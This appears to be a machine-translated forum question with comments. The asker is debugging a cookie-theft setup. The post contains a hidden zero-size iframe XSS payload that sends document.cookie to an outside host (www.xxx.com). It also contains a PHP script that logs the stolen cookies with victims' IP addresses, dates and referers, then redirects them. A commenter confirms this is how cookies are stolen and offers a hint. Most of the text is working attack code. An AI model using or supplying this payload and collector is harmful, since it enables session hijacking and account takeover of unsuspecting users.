<IFRAME WIDTH=0 HEIGHT=0 frameborder=0 SRC=jvoid(document.location="http://www.xxx.com/cookie.php?c"+document.cookie)></iframe>
然後傳遞一個iframe中的document.cookie從到PHP PHP文件:在一個單獨的域
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('logs.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br> <br> <br>');
fclose($fp);
header ("Location: http://www.xxx.com");
?>
logs.html
記錄比cookie-爲什麼其他的一切嗎?我測試了我的網站正在通過調用:document.cookie標籤來正確顯示cookie,所以其他內容已經啓動。 請指出我的愚蠢!
沒有CORS違規。這是_exactly_你如何竊取某人的cookie。 – Halcyon
請注意,「document.cookie」作爲查詢字符串的一部分傳遞。 – Halcyon